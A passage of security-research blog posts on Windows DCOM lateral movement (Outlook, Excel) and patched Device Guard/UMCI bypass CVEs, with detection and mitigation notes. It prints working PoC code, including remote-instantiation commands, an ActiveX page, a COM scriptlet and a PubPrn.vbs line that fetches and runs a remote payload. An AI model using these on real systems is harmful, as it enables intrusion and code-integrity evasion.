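A minimal sketch of such a payload (the class name is arbitrary; DotNetToJScript triggers the default constructor of the deserialized object):

using System.Diagnostics;

public class TestClass
{
    public TestClass()
    {
        // Runs when the serialized object is instantiated on the target
        Process.Start("calc.exe");
    }
}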

Note: Since it is just C#, this can be a full shellcode runner as well 🙂

After compiling the “payload”, you can pass it to DotNetToJScript and get back some beautiful JScript/VBScript. In this instance, it will be JScript.

Now that the payload has been generated, it can be passed to the ScriptControl COM object that was created via Outlook’s CreateObject method on the remote host. This can be accomplished by storing the entire JScript/VBScript code block into a variable in PowerShell. In this case, I have stored it in a variable called “$code”:
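As a sketch, with the generated JScript elided:

$code = @'
<paste the JScript emitted by DotNetToJScript here>
'@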

Finally, all that needs to be done is to set the “Language” property on the ScriptControl object to whichever language will be executed (JScript or VBScript) and then call the “AddCode()” method with the “$code” variable as a parameter:

$RemoteScriptControl.Language = "JScript"
$RemoteScriptControl.AddCode($code)

After the “AddCode()” method is invoked, the supplied JScript will execute on the remote host:

As you can see above, calc.exe has spawned on the remote host.

Detections and Mitigations:

You might have noticed in the above screenshot that Outlook.exe spawned as a child of svchost.exe. That is indicative of Outlook.Application being instantiated via DCOM remotely, so that should stick out. In most cases, the process being started will contain “-embedding” in the command line, which is also indicative of remote instantiation.

Additionally, module loads of vbscript.dll or jscript/jscript9.dll should stand out as well. Normally, Outlook does not load these and those being loaded would be indicators of the ScriptControl object being used.

In this example, the payload was running as a child process of Outlook.exe, which would be weird. It is important to remember that ultimately, a .NET assembly is being executed, meaning that shellcode injection is absolutely doable. Instead of simply starting a process, an attacker can write an assembly that injects shellcode into another process, which would bypass the parent-child relationship detection. Ultimately, enabling the Windows Firewall will prevent this attack as it stops DCOM usage.

-Matt N

A Look at CVE-2017-8715: Bypassing CVE-2017-0218 using PowerShell Module Manifests

Recently, Matt Graeber (@mattifestation) and I have been digging into methods to bypass User Mode Code Integrity (UMCI) in the context of Device Guard. As a result, many CVEs have been released, and Microsoft has done a good job of reducing the attack surface that PowerShell exposes under UMCI by continuing to improve Constrained Language Mode (CLM) – the primary PowerShell policy enforcement mechanism for Device Guard and AppLocker. The following mitigations significantly reduce the attack surface, and were a result of CVE-2017-0218.

The vast majority of these injection bugs abuse Microsoft-signed PowerShell scripts or modules that contain functionality to run unsigned code. This ranges all the way from calling Invoke-Expression on a parameter to custom implementations of PowerShell’s Add-Type cmdlet. Microsoft-signed PowerShell code is targeted because, under an AppLocker or Device Guard policy that permits Microsoft code, it will execute in Full Language Mode – i.e. with no restrictions placed on what code can be executed.

To fully understand the fix, let’s examine the behavior before the patch. The gist of this bug is that an attacker can use functions within a Microsoft-signed PowerShell script to bypass UMCI. To demonstrate this, let’s look at the script “utils_SetupEnv.ps1”, a component of Windows Troubleshooting Packs contained within C:\Windows\diagnostics. This particular script has a function called “import-cs”. This function simply takes C# code and calls Add-Type on it (note: Add-Type is blocked in constrained language mode). Since the script is Microsoft-signed, it executes in Full Language mode, allowing an attacker to execute arbitrary C#.
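A minimal sketch of the pattern and its abuse follows (not the verbatim script source; the parameter name and the diagnostics pack subfolder are assumptions):

# Abridged idea of import-cs from utils_SetupEnv.ps1
function import-cs
{
    param([string]$cscode)

    # Add-Type is normally blocked in CLM, but the signed script runs in Full Language Mode
    Add-Type -TypeDefinition $cscode
}

# The pack subfolder below is an assumption; utils_SetupEnv.ps1 ships under C:\Windows\diagnostics
Import-Module C:\Windows\diagnostics\system\Audio\utils_SetupEnv.ps1
import-cs $code  # $code holds attacker-supplied C#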

As you can see above, we imported “utils_SetupEnv.ps1”, which exposed the “import-cs” function to us. Using that function, we can pass it our own C# which gets executed, bypassing constrained language mode. The above bug was issued CVE-2017-0218 and fixed.

In response to bugs like the one above, Microsoft imposed a few additional restrictions when running in PowerShell’s Constrained Language Mode. The first one is that you are no longer allowed to import PowerShell scripts (.PS1s) via Import-Module or other means. If you try to import a script in CLM, you will see something like this:

One possible workaround would be to rename a PowerShell script (.PS1) to a module file (.PSM1) and import it that way, right? Well, that is where the second mitigation comes in.

Microsoft introduced a restriction on what you can import and use via PowerShell modules (.PSM1s). This was done with “Export-ModuleMember”; if you aren’t familiar with Export-ModuleMember, it defines which functions in a module are able to be used once it’s imported. In Constrained Language Mode, a module’s function has to be exported via Export-ModuleMember in order for it to be available. This significantly reduces the attack surface of functions to abuse in Microsoft-signed PowerShell modules. It’s also just good practice in general to explicitly define what functions you want to expose to users of your module.

If we rename “utils_SetupEnv.ps1” to “utils_SetupEnv.psm1” and try to import it, it will appear to import successfully. You will notice, however, that the “import-cs” function we used earlier isn’t recognized. This is because “import-cs” is not exposed via Export-ModuleMember.

If we look at a valid PowerShell module file, the Export-ModuleMember definition will look something like this:
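For instance, consistent with the description below:

Export-ModuleMember -Function 'Export-ODataEndpointProxy'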

What that essentially means is that only “Export-ODataEndpointProxy” can be used when the module is imported. This severely limits the abuse potential for Microsoft-signed PowerShell scripts that contain functions that can be abused to run unsigned code as most of them won’t be exposed. Again, the PowerShell team is slowly but surely mitigating many of the bypass primitives we use to circumvent Constrained Language Mode.

After investigating that fix, I discovered and reported a way around the Export-ModuleMember addition, which was assigned CVE-2017-8715 and fixed in the October Patch Tuesday release. This bypass abuses a PowerShell Module Manifest (.PSD1). When investigating the implications of these manifests, I realized that you could configure module behavior through them, and that they weren’t subject to the same signing requirements that many other PowerShell files are (likely since .PSD1 files don’t contain executable code). Despite that, .PSD1s can still be signed.

If we go back to the “utils_SetupEnv.ps1” script, the “import-cs” function is no longer available since no functions from that script are exposed via Export-ModuleMember. To get around this, we can rename “utils_SetupEnv.ps1” to “utils_SetupEnv.psm1” so we can import it. After doing so, we can drop a corresponding module manifest for “utils_SetupEnv.psm1” that exports the beloved “import-cs” function for us. This module manifest will look something like this:
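A sketch of such a manifest (the other field values are illustrative):

@{
    ModuleVersion     = '1.0'
    RootModule        = 'utils_SetupEnv.psm1'
    FunctionsToExport = @('import-cs')
}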

As you can see, we have set “import-cs” as a function to export via “FunctionsToExport”. This will export the function just as Export-ModuleMember would have. Since PowerShell module manifest files were not constrained to the same code signing requirements as other PowerShell files, we can simply create our own for the actual Microsoft signed script we want to abuse. After dropping the above manifest for the “utils_SetupEnv” PowerShell module, we can now use the “import-cs” function to execute arbitrary C# code, despite the newly introduced .PS1 import and Export-ModuleMember mitigation.

As I mentioned above, this bypass was issued CVE-2017-8715. The fix involved subjecting PowerShell module manifest files (.PSD1s) to the same code signing requirements as the other files in a module: if a module is signed and permitted by Device Guard or AppLocker policy, its manifest will only be honored if it is also signed pursuant to a whitelist rule. Doing so prevents an attacker from modifying an existing manifest or supplying their own.

As always, report any UMCI bypasses to MSRC for CVEs 🙂

-Matt N.

UMCI Bypass Using PSWorkFlowUtility: CVE-2017-0215

When looking for User Mode Code Integrity (UMCI) bypasses in the context of Device Guard, my typical approach has been to hunt for Microsoft-signed PowerShell scripts/modules that contain some sort of functionality that allows for unsigned code execution. Fortunately, there are plenty that exist on Windows 10 by default. One such bypass was CVE-2017-0215, which abused the “PSWorkFlowUtility” PowerShell module to execute arbitrary unsigned PowerShell code.

You might ask, how? Looking at this module, you will notice that it has an embedded Authenticode signature block, which makes it portable (an attacker can bring the old, vulnerable version to their target, as the certificate and file hash are included in the file). What else stands out to you?

We know that, in the context of UMCI, the most locked down scenario is only allowing Microsoft-signed code to run. Since this module is signed by Microsoft, it will be permitted to execute in Full Language Mode (as opposed to Constrained Language Mode). This particular module simply takes PowerShell code via a parameter (as a string) and then calls “Invoke-Expression” on it, which simply executes it.
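A minimal sketch of that pattern, plus the abuse it enables (the real Invoke-AsWorkflow is a Microsoft-signed workflow wrapper; this is abridged, not the module source):

# Abridged idea of Invoke-AsWorkflow from PSWorkFlowUtility
function Invoke-AsWorkflow
{
    param([string]$Expression)

    # Attacker-supplied code executes in the signed module's Full Language scope
    Invoke-Expression -Command $Expression
}

# Abuse: blocked when run directly in CLM, permitted via the signed module
Import-Module PSWorkflowUtility
Invoke-AsWorkflow -Expression '[Math]::Sqrt([Math]::PI)'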

As you can see, taking the square root of Pi is blocked in Constrained Language Mode, as method invocation on most .NET types is not permitted. If we import the PSWorkFlowUtility module and pass that code via the “-Expression” parameter, it will execute in Full Language Mode, giving us the result. To mitigate this, Microsoft fixed the built-in module by removing the Authenticode signature and adding “[System.Security.SecurityCritical()]”, which makes the module security transparent and subject to Constrained Language Mode (CVE-2017-0215).

Since the old, vulnerable module file was Authenticode signed (making it portable), the old, vulnerable version of the module must be explicitly blocked. This can be done via the file’s hash, but it is essential that all previous, vulnerable versions of the file be accounted for – a responsibility that should honestly lie with Microsoft, since they are able to collect the hashes across all Windows builds where the vulnerable module is present.

Another viable mitigation for blocking the old, vulnerable version is to note that the embedded signature is not Windows-signed (i.e. it lacks the Windows System Component Verification EKU – 1.3.6.1.4.1.311.10.3.6). Device Guard CI policies permit limiting a publisher rule by a specific enhanced key usage (EKU), and a stricter policy would allow only Windows-signed code to run – a rule that’s present in Matt Graeber’s Device Guard base reference policy. If only Windows-signed code is permitted to execute, the vulnerable version of Invoke-AsWorkflow would be limited to execution within Constrained Language Mode, effectively mitigating the previous vulnerability. Vulnerable code can and will be Windows-signed, but in this case, the vulnerability is effectively mitigated with a stronger Device Guard CI policy.

 

The old, vulnerable version of the module can be found here: https://gist.github.com/enigma0x3/dca6f24b2b94e120daae37505d209ecc

 

-Matt N.

Lateral Movement using Excel.Application and DCOM

Back in January, I put out two blog posts on using DCOM for lateral movement; one using MMC20.Application and the other outlining two other DCOM applications that expose “ShellExecute” methods. While most techniques have one execution method (WMI has the Create() method, psexec creates a service with a custom binpath, etc.), DCOM allows you to use different objects that expose various methods. This allows an operator to pick and choose what they look like when they land on the remote host from a parent-child process relationship perspective.

In this post, I’m going to walk through abusing the Excel.Application DCOM application to execute arbitrary code on a remote host. This same DCOM application was recently talked about for lateral movement by using the RegisterXLL method, which you can read about here. In this post, I’m going to focus on the “Run()” method. In short, this method allows you to execute a named macro in a specified Excel document. You can probably see where I’m going with this 🙂

As you all may know, VBA macros have long been a favorite technique for attackers. Normally, VBA abuse involves a phishing email with an Office document containing a macro, along with enticing text to trick the user into enabling that malicious macro. The difference here is that we are using macros for pivoting and not initial access. Due to this, Office Macro security settings are not something we need to worry about. Our malicious macro will execute regardless.

At this point, we know that Excel.Application is exposed via DCOM. By using OLEViewDotNet by James Forshaw (@tiraniddo), we can see that there are no explicit launch or access permissions set:

If a DCOM application has no explicit Launch or Access permissions, Windows allows members of the local Administrators group to launch and access the application remotely. This is because DCOM applications have a “Default” set of Launch and Access permissions, and if no explicit permissions are assigned, the Default set is used. This can be found in dcomcnfg.exe and will look like this:

Since Local Administrators are able to remotely interface with Excel.Application, we can then remotely instantiate it via PowerShell using [Activator]::CreateInstance():
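Using the same pattern shown earlier (the target IP is a placeholder):

$com = [Type]::GetTypeFromProgID("Excel.Application", "192.168.99.152")
$obj = [System.Activator]::CreateInstance($com)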

As you can see, remote instantiation succeeded. We now have the ability to interact with Excel remotely. Next, we need to move our payload over to the remote host. This will be an Excel document that contains our malicious macro. Since VBA allows Win32 API access, the possibilities are endless for various shellcode runners. For this example, we will just use shellcode that starts calc.exe. If you are curious, you can find an example here.

Just create a new macro, name it whatever you want, add in your code and then save it. In this instance, my macro name is “MyMacro” and I am saving the file in the .xls format.

With the actual payload created, the next step is to copy that file over to the target host. Since we are using this technique for Lateral Movement, we need Local Admin rights on the target host. Since we have that, we can just copy the file over:
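A sketch with hypothetical file names, reusing the placeholder target:

Copy-Item -Path .\myexcel.xls -Destination "\\192.168.99.152\C$\myexcel.xls"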

With the payload on target, we just need to execute it. This can be done using the Run() method of the Excel.Application DCOM application that was instantiated earlier. Before we can actually call that method, the application needs to know what Excel file the macro resides in. This can be accomplished using the “Workbooks.Open()” method. This method just takes the local path of the file. So, what happens if we invoke the method and pass the location of the file we just copied?
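Something like this (the local path is where the file landed on the target):

$obj.Workbooks.Open("C:\myexcel.xls")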

Well, isn’t that interesting. The file exists, but Excel.Application is stating that it doesn’t. Why might this be? When Excel.Application is instantiated via DCOM, it is actually instantiated via the Local System identity. The Local System user, by default, does not have a profile. Since Excel assumes that it is in an interactive user session, it fails in a less than graceful way. How can we fix this? There are better ways to do this, but a quick solution is to remotely create the Local System profile.

The path for this profile will be: C:\Windows\System32\config\systemprofile\Desktop and C:\Windows\SysWOW64\config\systemprofile\Desktop.
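A sketch of creating those folders remotely over the admin share (placeholder target again):

New-Item -ItemType Directory -Force -Path "\\192.168.99.152\C$\Windows\System32\config\systemprofile\Desktop"
New-Item -ItemType Directory -Force -Path "\\192.168.99.152\C$\Windows\SysWOW64\config\systemprofile\Desktop"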

Now that the Local System profile is created, we need to re-instantiate the Excel.Application object and then call “Workbooks.Open()” again:

As you can see, we were now able to open the workbook containing our malicious macro. At this point, all we need to do is call the “Run()” method and pass it the name of our malicious macro. If you remember from above, I named mine “MyMacro”.
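The call itself is a one-liner:

$obj.Run("MyMacro")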

Calling Run(“MyMacro”) will cause the VBA in that macro to execute. To confirm, we can open Process Explorer on the remote host. As you can see below, this particular host has the “Disable VBA for Office Applications” GPO set. Regardless of that security setting, the macro is permitted to execute:

For this example, I just used calc spawning shellcode, which resulted in a child process being spawned under Excel.exe. Keep in mind that since VBA offers a lot in terms of interaction with the OS, it is possible to not spawn a child process and just inject into another process instead. The final steps would be to remotely cleanup the Excel object and delete the payload off the target host.

I have automated this technique via PowerShell, which you can find here: https://gist.github.com/enigma0x3/8d0cabdb8d49084cdcf03ad89454798b

To assist in mitigating this vector, you could manually apply remote Launch and Access permissions to the Excel.Application object…but don’t forget to look at all the other Office applications. Another option would be to change the default remote Launch/Access DACLs via dcomcnfg.exe. Keep in mind that any DACL changes should be tested, as such modifications could potentially impact legitimate usage. In addition to that, enabling the Windows Firewall and reducing the number of Local Administrators on a host are also valid mitigation steps.

What stands out the most with this technique is that Excel and the child process will spawn as the invoking user. This will often show up as process creations under a user account different than the one currently logged on. If those are the only two processes running under that account, and the account doesn’t normally log on to that host, that might be a red flag.

-Matt N.

UMCI vs Internet Explorer: Exploring CVE-2017-8625

In recent months, I have spent some time digging into Device Guard and how User Mode Code Integrity (UMCI) is implemented. If you aren’t familiar with Device Guard, you can read more about it here. Normally, UMCI prevents unapproved binaries from executing, restricts the Windows Scripting Host, and places PowerShell in Constrained Language Mode. This makes obtaining code execution on a system fairly challenging. This post is going to highlight bypassing User Mode Code Integrity to instantiate objects that are normally blocked.

This bug was fixed in the August 2017 Patch Tuesday release under CVE-2017-8625. The patch fixed two different techniques, as both of them abuse the fact that MSHTML isn’t enlightened. The other technique abused Microsoft Compiled HTML Help files (CHMs). This was blogged about by @Oddvarmoe, and you can read more about it here: https://msitpros.com/?p=3909

As I mentioned above, the root cause of the bug was that MSHTML wasn’t enlightened in the context of UMCI. This essentially means that Device Guard’s UMCI component didn’t restrict MSHTML and simply let it execute everything with assumed “Full Trust.” Due to this, Internet Explorer permitted loading restricted objects. How, you might ask? The answer lies with Internet Explorer’s ability to interface with ActiveX and COM components =)

For example, the below HTML file will use a script tag to run some JScript. UMCI normally blocks instantiation of this object (and just about every other one). As a PoC, I just instantiated WScript.Shell and invoked the “Run” method to demonstrate I could instantiate a blocked object and invoke one of its methods.
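A minimal sketch of such a PoC page:

<html>
<head>
<script language="JScript">
    // Normally blocked under UMCI; permitted here because MSHTML wasn't enlightened
    var shell = new ActiveXObject("WScript.Shell");
    shell.Run("calc.exe");
</script>
</head>
</html>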

As you can see below, “WScript.Shell” was blocked from instantiating via UMCI. Immediately following that, we instantiate “WScript.Shell” again via the HTML file and then start “calc.exe” via the “Run” method:

Since MSHTML didn’t conform to the same restrictions as other OS components, the WScript.Shell object was permitted to load and the run method was freely accessible.

It should be noted that Internet Explorer does apply zone security to prevent automatic execution of ActiveX controls via HTML. When opened, the user will see two prompts, one from IE asking permission to enable the ActiveX content and another security warning alerting the user that the content might be malicious. If an attacker is on a system but doesn’t have unsigned code execution (see WMImplant), all it takes is two User Hive registry changes to temporarily disable the ActiveX alerting, allowing for silent unsigned code-execution. Those two changes look like this:

Most UMCI bypasses are serviceable bugs per Microsoft, so be sure to send those over to secure@microsoft.com if you like CVEs =)

With CVE-2017-8625 issued, ActiveX/COM controls are no longer able to be loaded as Internet Explorer is now enlightened. This hopefully makes MSHTML bypasses a bit harder to find =)

Disclosure timeline:

12/13/2016: Report submitted to secure@microsoft.com
03/2017: Fix was pushed into RS2 (Creators Update)
08/08/2017: RS2 fix was back ported; CVE-2017-8625 issued

-Matt N.

WSH Injection: A Case Study

At BSides Nashville 2017, Casey Smith (@SubTee) and I gave a talk titled Windows Operating System Archaeology. In that talk, we released a handful of offensive techniques that utilized the Component Object Model (COM) in Windows. One such technique abuses attacker-controlled input passed to calls to GetObject(), which I will be discussing here.

Some environments use whitelisting to prevent unsigned Windows Scripting Host (WSH) files from running, especially with the rise of malicious .js or .vbs files. However, by “injecting” our malicious code into a Microsoft signed WSH script, we can bypass such a restriction.

Before diving into the different scripts that can be used for injection, it’s important to understand some of the mechanics behind why this works. When abusing injection, we are taking advantage of attacker-controlled input passed to GetObject() and then combining that with the “script:” or “scriptlet:” COM monikers.

GetObject()

This method allows you to access an already instantiated COM object. If there isn’t an instance of the object already (if invoked without a moniker), this call will fail. For example, accessing Microsoft Excel’s COM object via GetObject() would look like this:

Set obj = GetObject( , "Excel.Application")

For the above to work, an instance of Excel has to be running. You can read more about GetObject() here.

COM Monikers

While GetObject() is interesting by itself, it only allows us to access an instance of an already instantiated COM object. To get around this, we can implement a COM moniker to facilitate our payload execution. If you aren’t familiar with COM monikers, you can read more about them here. There are various COM monikers on Windows that allow you to instantiate objects in various ways. From an offensive standpoint, you can use these monikers to execute malicious code. That is a topic for another blog post :-).

For this post, we will focus on the “script:” and “scriptlet:” monikers. These particular monikers interface with scrobj.dll and help facilitate execution of COM scriptlets, which will be the payload. This was discovered by Casey Smith (@SubTee) and discussed at DerbyCon 2016 as well as blogged about here.

An example COM scriptlet will look like this:

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}">
    <script language="JScript">
        <![CDATA[
            var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
        ]]>
    </script>
</registration>
</scriptlet>

You can also use James Forshaw’s (@tiraniddo) tool DotNetToJScript to extend the JScript/VBScript in the COM Scriptlet, allowing for Win32 API access and even Shellcode execution. When you combine one of these two monikers and various calls to GetObject(), a lot of fun is had.

Now that the very brief COM background is over, time to look at an example 🙂

PubPrn.vbs

On Windows 7+, there is a Microsoft-signed WSH script called “PubPrn.vbs,” which resides in “C:\Windows\System32\Printing_Admin_Scripts\en-US”. When looking at this particular script, it becomes apparent that it takes input provided by the user (via command line arguments) and passes one of those arguments to “GetObject()”.

This means that we can run this script and pass it the two arguments it expects. The first argument can be anything and the second argument is the payload via the script: moniker.

Note: If you provide a value that isn’t a network address for the first argument (since it expects a ServerName), you can add the “/b” switch to cscript.exe when calling to suppress any additional error messages.
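Putting it together, an invocation looks like this (the payload URL is hypothetical):

cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\PubPrn.vbs 127.0.0.1 script:https://example.com/payload.sct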

Since VBScript relies on COM to perform actions, it is used heavily in numerous Microsoft signed scripts. While this is just one example, there are bound to be others that can be exploited in a similar fashion. I encourage you to go hunting 🙂

-Matt N.